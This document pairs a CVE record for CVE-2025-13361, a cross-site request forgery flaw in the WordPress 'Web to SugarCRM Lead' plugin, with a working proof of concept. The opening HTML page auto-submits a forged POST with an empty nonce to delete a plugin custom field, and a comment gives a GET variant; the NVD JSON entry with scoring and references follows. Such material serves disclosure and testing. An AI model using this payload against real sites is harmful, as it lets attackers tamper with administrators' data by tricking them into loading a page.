CVE-2025-13361

<!-- CSRF PoC for CVE-2025-13361 --> <!-- This PoC demonstrates the CSRF vulnerability in Web to SugarCRM Lead plugin --> <!DOCTYPE html> <html> <head> <title>CSRF Attack PoC - CVE-2025-13361</title> </head> <body> <h1>CSRF PoC for WordPress Web to SugarCRM Lead Plugin</h1> <p>This page will automatically submit a forged request to delete custom fields.</p> <form id="csrfForm" action="http://target-wordpress-site/wp-admin/admin.php" method="POST"> <!-- Identify the plugin page --> <input type="hidden" name="page" value="wpscl-custom-fields"> <!-- Custom field deletion action --> <input type="hidden" name="action" value="wpscl_delete_custom_field"> <!-- Target field ID to delete (attacker controlled) --> <input type="hidden" name="field_id" value="1"> <!-- CSRF token (missing nonce validation - this is the vulnerability) --> <!-- No nonce field or invalid nonce would be accepted due to missing validation --> <input type="hidden" name="_wpnonce" value=""> </form> <script> // Auto-submit the form when page loads document.getElementById('csrfForm').submit(); console.log('CSRF request sent'); </script> <p>If you see this message, the request has been sent.</p> </body> </html> <!-- Alternative: Simple GET request PoC (if supported) --> <!-- http://target-wordpress-site/wp-admin/admin.php?page=wpscl-custom-fields&action=wpscl_delete_custom_field&field_id=1 -->

{"cve": {"id": "CVE-2025-13361", "sourceIdentifier": "[email protected]", "published": "2025-12-21T04:16:04.350", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Web to SugarCRM Lead plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0.0. This is due to missing nonce validation on the custom field deletion functionality. This makes it possible for unauthenticated attackers to delete custom fields via a forged request granted they can trick a site administrator into performing an action such as clicking on a link."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/web-to-sugarcrm-lead/tags/1.0.0/wpscl-admin-functions.php#L496", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/web-to-sugarcrm-lead/trunk/wpscl-admin-functions.php#L496", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3423497%40web-to-sugarcrm-lead&new=3423497%40web-to-sugarcrm-lead", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/b7c54b5d-ad73-44f1-afdb-01136ec0b9ae?source=cve", "source": "[email protected]"}]}}